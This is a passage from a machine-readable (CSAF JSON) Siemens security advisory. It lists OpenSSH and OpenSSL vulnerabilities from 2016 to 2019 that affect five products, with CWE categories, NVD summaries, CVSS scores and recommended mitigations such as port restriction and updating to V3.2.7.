"CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.3, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-10009" }, { "cve": "CVE-2016-10010", "cwe": { "id": "CWE-284", "name": "Improper Access Control" }, "notes": [ { "category": "summary", "text": "sshd in OpenSSH before 7.4, when privilege separation is not used, creates forwarded Unix-domain sockets as root, which might allow local users to gain privileges via unspecified vectors, related to serverloop.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10010" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.0, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-10010" }, { "cve": "CVE-2016-10011", "cwe": { "id": "CWE-244", "name": "Improper Clearing of Heap Memory Before Release (\u0027Heap Inspection\u0027)" }, "notes": [ { "category": "summary", "text": "authfile.c in sshd in OpenSSH before 7.4 does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10011" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.5, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-10011" }, { "cve": "CVE-2016-10012", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The shared memory manager (associated with pre-authentication compression) in sshd in OpenSSH before 7.4 does not ensure that a bounds check is enforced by all compilers, which might allows local users to gain privileges by leveraging access to a sandboxed privilege-separation process, related to the m_zback and m_zlib data structures.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10012" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.8, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-10012" }, { "cve": "CVE-2017-3735", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-3735" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2017-3735" }, { "cve": "CVE-2017-15906", "cwe": { "id": "CWE-732", "name": "Incorrect Permission Assignment for Critical Resource" }, "notes": [ { "category": "summary", "text": "The process_open function in sftp-server.c in OpenSSH before 7.6 does not properly prevent write operations in readonly mode, which allows attackers to create zero-length files.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15906" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:U/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2017-15906" }, { "cve": "CVE-2018-15473", "cwe": { "id": "CWE-362", "name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)" }, "notes": [ { "category": "summary", "text": "OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15473" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:U/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2018-15473" }, { "cve": "CVE-2018-20685", "cwe": { "id": "CWE-863", "name": "Incorrect Authorization" }, "notes": [ { "category": "summary", "text": "In OpenSSH 7.9, scp.c in the scp client allows remote SSH servers to bypass intended access restrictions via the filename of . or an empty filename. The impact is modifying the permissions of the target directory on the client side.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20685" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2018-20685" }, { "cve": "CVE-2019-1552", "cwe": { "id": "CWE-295", "name": "Improper Certificate Validation" }, "notes": [ { "category": "summary", "text": "OpenSSL has internal defaults for a directory tree where it can find a configuration file as well as certificates used for verification in TLS. This directory is most commonly referred to as OPENSSLDIR, and is configurable with the --prefix / --openssldir configuration options. For OpenSSL versions 1.1.0 and 1.1.1, the mingw configuration targets assume that resulting programs and libraries are installed in a Unix-like environment and the default prefix for program installation as well as for OPENSSLDIR should be \u0027/usr/local\u0027. However, mingw programs are Windows programs, and as such, find themselves looking at sub-directories of \u0027C:/usr/local\u0027, which may be world writable, which enables untrusted users to modify OpenSSL\u0027s default configuration, insert CA certificates, modify (or even replace) existing engine modules, etc. For OpenSSL 1.0.2, \u0027/usr/local/ssl\u0027 is used as default for OPENSSLDIR on all Unix and Windows targets, including Visual C builds. However, some build instructions for the diverse Windows targets on 1.0.2 encourage you to specify your own --prefix. OpenSSL versions 1.1.1, 1.1.0 and 1.0.2 are affected by this issue. Due to the limited scope of affected deployments this has been assessed as low severity and therefore we are not creating new releases at this time. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1552" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.3, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2019-1552" }, { "cve": "CVE-2019-6109", "cwe": { "id": "CWE-116", "name": "Improper Encoding or Escaping of Output" }, "notes": [ { "category": "summary", "text": "An issue was discovered in OpenSSH 7.9. Due to missing character encoding in the progress display, a malicious server (or Man-in-The-Middle attacker) can employ crafted object names to manipulate the client output, e.g., by using ANSI control codes to hide additional files being transferred. This affects refresh_progress_meter() in progressmeter.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6109" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 6.8, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2019-6109" }, { "cve": "CVE-2019-6110", "cwe": { "id": "CWE-838", "name": "Inappropriate Encoding for Output Context" }, "notes": [ { "category": "summary", "text": "In OpenSSH 7.9, due to accepting and displaying arbitrary stderr output from the server, a malicious server (or Man-in-The-Middle attacker) can manipulate the client output, for example to use ANSI control codes to hide additional files being transferred.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6110" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 6.8, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2019-6110" }, { "cve": "CVE-2019-6111", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "notes": [ { "category": "summary", "text": "An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6111" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2019-6111" }, { "cve": "CVE-2019-16905", "cwe": { "id": "CWE-190", "name": "Integer Overflow or Wraparound" }, "notes": [ { "category": "summary", "text": "OpenSSH 7.7 through 7.9 and 8.x before 8.1, when compiled with an experimental key type, has a pre-authentication integer overflow if a client or server is configured to use a crafted XMSS key. This leads to memory corruption and local code execution because of an error in the XMSS key parsing algorithm. NOTE: the XMSS implementation is considered experimental in all released OpenSSH versions, and there is no supported way to enable it when building portable OpenSSH.", "title": "Summary" } ], 